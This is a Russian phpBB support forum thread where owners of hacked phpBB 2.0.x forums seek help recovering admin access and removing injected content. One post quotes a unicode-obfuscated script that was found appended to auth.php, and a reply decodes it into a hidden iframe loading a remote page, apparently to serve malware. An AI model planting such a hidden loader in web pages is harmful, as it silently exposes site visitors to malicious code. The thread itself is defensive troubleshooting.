Уважаемые пользователи!
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.

Взломали форум phpBB 2.0.21, нужна помощь восстановить!

Проблемы с установкой или работой phpBB 2.0.x? Ищите ответы здесь!
Boglik
phpBB 1.4.0
Сообщения: 32
Стаж: 16 лет 6 месяцев

Сообщение Boglik »

подскажите пожалуста, и скажите как был взломан форум, как защитится от повторного?
Смотри логи.[/quote]
Ne$ter
phpBB 1.4.0
Сообщения: 30
Стаж: 16 лет 7 месяцев

Сообщение Ne$ter »

crash писал(а):
Ne$ter писал(а):подскажите пожалуста, и скажите как был взломан форум
протелепатировать чтоли?
Хотябы подскажите как вернуть админку.

Добавлено спустя 15 минут 31 секунду:

25 include($phpbb_root_path . 'extension.inc');
26 include($phpbb_root_path . 'common.'.$phpEx);


31 $userdata = session_pagestart($user_ip, PAGE_INDEX);
ParSulTang
phpBB 1.2.1
Сообщения: 21
Стаж: 16 лет 8 месяцев
Контактная информация:

Сообщение ParSulTang »

crash, ну я это и имел ввиду (не верно выразился). Будут залатываться уязвимости дальше?
0-n-e
phpBB 1.0.0
Сообщения: 7
Стаж: 16 лет 6 месяцев

Сообщение 0-n-e »

у меня вот сегодня появились те же ошибки, в файле auth.php, после ?> появился скрипт:

Код: Выделить всё

<script type="text/javascript">document.write('\u003c\u0069\u0046\u0072\u0041\u006d
\u0045\u0020\u0073\u0052\u0063\u003d\u0022\u0068\u0074\u0074
\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0073
\u0075\u0070\u0064\u0061\u0074\u0065\u002e\u006f\u0072\u0067
\u002f\u0075\u0070\u0064\u0061\u0074\u0065\u005f\u0066\u0069
\u006c\u0065\u0073\u002f\u0075\u0070\u0064\u0061\u0074\u0065
\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0043\u0052\u004f
\u006c\u006c\u0049\u004e\u0067\u003d\u0027\u006e\u006f\u0027
\u0020\u0077\u0049\u0064\u0054\u0068\u003d\u0022\u0030\u0030
\u0030\u0031\u0022\u0020\u0068\u0045\u0069\u0067\u0048\u0074
\u003d\u0027\u0030\u0030\u0030\u0031\u0027\u0020\u0073\u0054
\u0059\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c
\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u0020\u006e
\u0061\u006d\u0065\u003d\u0022\u0061\u006e\u0034\u0073\u0073
\u006f\u006c\u006c\u0022\u003e\u0062\u0075\u0064\u006f\u0070
\u0065\u0073\u0068\u0074\u002e\u002e\u002e\u002f\u002f\u002f
\u003c\u002f\u0069\u0046\u0072\u0041\u006d\u0045\u003e')
</script>
Скрипт удалил, все стало на свои места!
что это может быть?
Аватара пользователя
Alek$
Former team member
Сообщения: 2616
Стаж: 18 лет 7 месяцев
Откуда: Новосибирск
Поблагодарили: 37 раз
Контактная информация:

Сообщение Alek$ »

0-n-e
это может быть взлом.
Обновите все скрипты на сайте и проверьте их на наличие бекдоров.
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
Ne$ter
phpBB 1.4.0
Сообщения: 30
Стаж: 16 лет 7 месяцев

Сообщение Ne$ter »

Немного посидел и запустилось дальше, но есть одна проблема, прошу помочь.
было так вот $phpbb_root_path = './'; исправил на
$phpbb_root_path = '../'; хотя файл не изменялся, но есть одно но
Кодгда заходиш в админку, то при вводе первого пароля выбрасывает вродебы как на индексовую страницу форума без картинок, но я не активирован, хотя путь указан правильно.

Что может быть, подскажите!
Аватара пользователя
/DiOs
Former team member
Сообщения: 1139
Стаж: 18 лет 1 месяц
Откуда: Ленинград

Сообщение /DiOs »

Ne$ter писал(а):было так вот $phpbb_root_path = './'; исправил на
$phpbb_root_path = '../'; хотя файл не изменялся, но есть одно но
Вы уверены, что вы исправили, а не заменили??? Где бы то ни было, первое осначает "текущий каталог", а второе -- "родительский каталог". Что сказать-то хотели?
И если я неправ, пусть старшие товарищи поправят меня
0-n-e
phpBB 1.0.0
Сообщения: 7
Стаж: 16 лет 6 месяцев

Сообщение 0-n-e »

Alek$ писал(а):проверьте их на наличие бекдоров.
как это сделать?
Аватара пользователя
Alek$
Former team member
Сообщения: 2616
Стаж: 18 лет 7 месяцев
Откуда: Новосибирск
Поблагодарили: 37 раз
Контактная информация:

Сообщение Alek$ »

0-n-e
сравнить с бекапами.
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
Rostunov
phpBB 1.0.0
Сообщения: 4
Стаж: 16 лет 1 месяц

Сообщение Rostunov »

0-n-e писал(а):у меня вот сегодня появились те же ошибки, в файле auth.php, после ?> появился скрипт:

Код: Выделить всё

<script type="text/javascript">document.write('\u003c\u0069\u0046\u0072\u0041\u006d
\u0045\u0020\u0073\u0052\u0063\u003d\u0022\u0068\u0074\u0074
\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0073
\u0075\u0070\u0064\u0061\u0074\u0065\u002e\u006f\u0072\u0067
\u002f\u0075\u0070\u0064\u0061\u0074\u0065\u005f\u0066\u0069
\u006c\u0065\u0073\u002f\u0075\u0070\u0064\u0061\u0074\u0065
\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0043\u0052\u004f
\u006c\u006c\u0049\u004e\u0067\u003d\u0027\u006e\u006f\u0027
\u0020\u0077\u0049\u0064\u0054\u0068\u003d\u0022\u0030\u0030
\u0030\u0031\u0022\u0020\u0068\u0045\u0069\u0067\u0048\u0074
\u003d\u0027\u0030\u0030\u0030\u0031\u0027\u0020\u0073\u0054
\u0059\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c
\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u0020\u006e
\u0061\u006d\u0065\u003d\u0022\u0061\u006e\u0034\u0073\u0073
\u006f\u006c\u006c\u0022\u003e\u0062\u0075\u0064\u006f\u0070
\u0065\u0073\u0068\u0074\u002e\u002e\u002e\u002f\u002f\u002f
\u003c\u002f\u0069\u0046\u0072\u0041\u006d\u0045\u003e')
</script>
Скрипт удалил, все стало на свои места!
что это может быть?
У меня тоже самое. Интересно, что этот скрипт делает, как расшифровать?

Добавлено

Ага, декодировал этот код:

Код: Выделить всё

<iFrAmE sRc="http://www.msupdate.org/update_files/update.php" sCROllINg='no' wIdTh="0001" hEigHt='0001' sTYle="display:none" name="an4ssoll">budopesht...///</iFrAmE>
batss
phpBB 1.0.0
Сообщения: 5
Стаж: 16 лет 7 месяцев

Сообщение batss »

Добрый день! Подскажите, пожалуйста!
С сегодняшнего дня при добавлении поста, перед текстом любого пользователя появляется строка: "http://casinopills.com/ukrainskomu_narodu/ tolko posmotrite, vot idioti!!!!" ...
Я не знаю где ее искать. Стыдно. Поискал файлы форума на ниличие хотя бы одного из слов - не нашел. Перезалил из бекапа файлы директорий templates и language - не помогает.
Подскажите, пожалуйста. Сайт и форум серьезный, а эта злополучная строчка, бросает позорную тень. Понятно, что взломали, но как это лечить??? Форум мой лежит здесь http://forum.shooting-ua.com/
Аватара пользователя
crash
Former team member
Сообщения: 6517
Стаж: 19 лет 8 месяцев
Откуда: Бердск
Поблагодарили: 15 раз
Контактная информация:

Сообщение crash »

посмотрите автоцензор
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Аватара пользователя
Поручик
Former team member
Сообщения: 3942
Стаж: 18 лет 10 месяцев
Откуда: Оренбург (Южный Урал)
Благодарил (а): 24 раза
Поблагодарили: 54 раза
Контактная информация:

Сообщение Поручик »

Остальные файлы перезалейте. И дайте тестовый аккаунт, что-то не нашел этой строки.
Профессионал - тот же дилетант, только знающий, где ошибётся.
Генератор db_update.php для phpBB2 с некоторыми удобствами. Многие моды я беру или ищу здесь, здесь, тут
Все консультации только на форуме, приваты и стук в аську по таким вопросам игнорируются!
FAQ-phpBB3 | Ошибки новичков, или как не поссориться с модератором | Правила конференции

наш форум http://forum.aeroion.ru/cat1.html
batss
phpBB 1.0.0
Сообщения: 5
Стаж: 16 лет 7 месяцев

Сообщение batss »

Уважаемые Знатоки!
Приношу свои извинения, что не смог ответить сразу. Был в дали от компьютера.
Спасибо. Проблема решена. Был и сидит вирус на локальном компьютере. Т.к. даже на тестовом тоже самое - с других же машин - проблема не замечена.
V_r
phpBB 1.0.0
Сообщения: 2
Стаж: 15 лет 1 месяц

Re: Взломали форум phpBB 2.0.23, нужна помощь восстановить!

Сообщение V_r »

Господа!

Уже второй раз ломают мой форум.
Оба раза одна и таже контора.

Оба раза кто-то получал права админа и оставлял мне следующее сообщение под моим же ником:
HACKED BY SECURITYBUS

CONTACT ME: securitybus@gmail.com

____evilc0der.com/defacer/1/SecurityBus/
удалив попутно часть сообщений форума


Версия была 2.0.22.

После первого раза обновил до 2.0.23. Востановил базу (хорошо успел бекап сделать). Вроде бы притих. Но через 5 дней опять обьявился с тем же самым сообщением. Засек IP, но они у него меняются. Заметил, что перед атакой похоже или затирался или изменялся .htaccess

На форуме установлено много модов, может какой-то из них открыл дыру в системе?

Подскажите, как с этим хакером бороться?
Log-hakera.txt
Лог работы хакера на моем сайте
(34.25 КБ) 278 скачиваний
Проанализировав лог, пришел к выводу, что админ права хацкер получил через wap-gate форума.
Правильно?
Поэтому наверное буду удалять этот мод.
Закрыто

Вернуться в «Поддержка phpBB 2.0.x»